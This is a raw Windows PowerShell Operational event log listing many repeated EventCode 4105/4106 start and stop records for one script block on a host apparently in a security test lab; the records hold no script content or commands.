OpCode=On create calls
RecordNumber=1473910
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473909
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473908
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473907
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473906
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473905
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473904
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473903
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473902
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473901
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473900
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473899
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473898
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473897
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473896
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473895
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473894
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473893
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473892
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473891
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473890
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473889
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473888
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473887
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473886
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473885
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473884
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473883
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473882
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473881
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473880
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473879
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473878
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473877
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473876
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473875
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473874
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473873
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473872
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473871
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473870
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473869
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473868
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473867
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473866
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473865
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473864
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473863
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473862
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473861
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473860
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473859
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473858
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473857
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473856
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
